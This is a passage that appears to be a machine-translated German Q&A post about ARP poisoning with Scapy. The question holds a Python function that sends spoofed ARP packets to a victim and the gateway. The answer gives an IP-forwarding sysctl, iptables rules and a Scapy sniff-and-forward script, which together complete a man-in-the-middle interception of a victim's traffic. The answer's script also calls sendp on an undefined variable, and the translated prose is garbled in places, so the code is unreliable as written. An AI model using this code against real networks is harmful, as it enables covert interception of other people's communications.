Paketweiterleitung während ARP

Question

vergiften wollte ich einen „Proxy“, während ARP-Poisoning machen, es mit UDP funktioniert und wenn ich eine pkt sende ich sehe es auf meinem PC Google wireshark mit

def trick(gate_mac, victim_mac): 
    '''Tricks the victim and the gate_way, using arp''' 
    my_mac=ARP() 
    my_mac=my_mac.hwsrc 
    sendp(Ether(dst=ETHER_BROADCAST)/ARP(pdst= victim_ip, psrc = gate_ip, hwdst= victim_mac)) 
    sendp(Ether(dst=ETHER_BROADCAST)/ARP(pdst= gate_ip, psrc = victim_ip, hwdst= my_mac)) 
    print "TRICKED" 

, dass das ist Funktion Ich schrieb an ARP Poison, jetzt möchte ich alle Pakete senden, die ich vom PC des Opfers an den Router/ bekomme, aber ich habe keine Ahnung, wie Paket-Weiterleitung zu tun.

Answer 1

Sie können einfach Ihre OS-Paketweiterleitung aktivieren. Wenn Sie Linux verwenden, sollte ein einfacher sysctl -w net.ipv4.ip_forward=1 das tun.

Sie müssen möglicherweise auch die Pakete durch Ihre Firewall passieren lassen, so etwas wie iptables -A FORWARD -s victim_ip -j ACCEPT; iptables -A FORWARD -d victim_ip -j ACCEPT sollte funktionieren (wenn Sie wieder Linux verwenden).

Unter anderen Betriebssystemen müssen Sie herausfinden, wie die Paketweiterleitung aktiviert und bei Bedarf Firewall-Regeln hinzugefügt werden. Wenn Sie die Paketweiterleitung nicht aktivieren können, können Sie ein anderes Scapy-Skript ausführen, um Pakete für Sie weiterzuleiten. Hier ein Beispiel:

VICTIM_MAC = "00:01:23:45:67:89" 
GATEWAY_MAC = "00:98:76:54:32:10" 
_SRC_DST = { 
    GATEWAY_MAC: VICTIM_MAC, 
    VICTIM_MAC: GATEWAY_MAC, 
} 

def forward_pkt(pkt): 
    pkt[Ether].dst = _SRC_DST.get(pkt[Ether].src, GATEWAY_MAC) 
    sendp(dst) 

sniff(
    prn=forward_pkt, 
    filter="ip and (ether src %s or ether src %s)" % (VICTIM_MAC, 
                 GATEWAY_MAC) 
)